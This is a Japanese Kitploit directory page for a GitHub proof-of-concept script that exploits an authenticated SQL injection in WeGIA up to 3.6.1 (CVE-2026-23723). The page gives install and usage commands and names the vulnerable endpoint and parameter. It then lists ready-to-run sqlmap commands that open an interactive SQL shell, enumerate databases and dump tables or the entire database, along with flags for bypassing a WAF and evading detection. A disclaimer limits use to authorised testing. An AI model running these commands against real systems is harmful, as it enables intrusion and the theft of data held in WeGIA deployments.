Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23723-POC — これは、WeGIA(≤ 3.6.1)における認証済みエラーベースSQLインジェクションの脆弱性(GHSA-xfmp-2hf9-gfjpとして識別)向けに、sqlmap互換のPoCファイル生成を自動化するために設計された軽量なPythonヘルパースクリプトです。 | Kitploit
ツール/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

これは、WeGIA(≤ 3.6.1)における認証済みエラーベースSQLインジェクションの脆弱性(GHSA-xfmp-2hf9-gfjpとして識別)向けに、sqlmap互換のPoCファイル生成を自動化するために設計された軽量なPythonヘルパースクリプトです。

リポジトリを見る
316ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23723 PoC - WeGIA 認証済みSQLインジェクション悪用ヘルパー

WeGIA ≤ 3.6.1 における認証済みエラーベースSQLインジェクション
GHSA-xfmp-2hf9-gfjp | 公式アドバイザリ

PoC 原作者 / 報告者: ViniCastro2001 GHSA 公開者: nilsonLazarin(プロジェクトメンテナー)

この軽量Pythonスクリプトは以下を自動化します:

  • 提供された認証情報を使用したWeGIAシステムへのログイン
  • 有効なPHPセッションCookieの取得
  • sqlmap互換のリクエストファイルの生成(インジェクションポイントは id_memorando=1* としてマーク)
  • 列挙、対話型シェル、データダンプ用の実行可能なsqlmapコマンドの出力

特徴

  • 互換性向上のため、複数の一般的なログインパスとフォームフィールド名を試行
  • sqlmapリクエストファイル(.req)を生成
  • 以下のコピー&ペースト可能なsqlmapコマンドを提供:
    • 対話型MySQLライクシェル(--sql-shell)
    • データベース / テーブル列挙
    • 対象テーブルのダンプまたはデータベース全体のダンプ

要件

  • Python 3.x
  • requests ライブラリ(ほとんどのペネトレーションテスト環境には既にインストール済み)
  • sqlmap がインストールされ、PATHに設定されていること

インストール

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

使用方法

root@kitploit:~
# 推奨: 対話型パスワードプロンプト
python CVE-2026-23723.py --url http://target.com -u admin

# パスワードを直接指定
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# カスタム出力ファイル
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

正常に実行されると、スクリプトは以下を行います:

ログインを試行 wegia_sqlmap.req(またはカスタムファイル名)を生成 すぐに使用できるsqlmapコマンドを表示

生成されるコマンドの例:

root@kitploit:~
# 1. 対話型MySQLライクシェル(最も推奨)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. 現在のデータベースと全データベースを表示
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. wegiaデータベース内のテーブル一覧を表示
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. 特定のテーブルをダンプ(例: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. wegiaデータベース全体をダンプ(注意!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
任意のsqlmapフラグ:

--proxy=http://127.0.0.1:8080 (Burp/ZAP経由)
--tamper=space2comment,randomcase (基本的なWAFバイパス)
--delay=1 (検出を避けるために速度を落とす)

自動ログインが失敗する場合 ブラウザで手動ログイン → 完全なCookieヘッダーをコピー → sqlmapを直接実行:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

法的免責事項 このPoCは教育目的および許可されたペネトレーションテスト目的のみで提供されています。 許可なくシステムに対して使用することは違法であり、禁止されています。 著者および貢献者は、誤用または生じたいかなる損害についても責任を負いません。 参考文献

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

ツールをダウンロード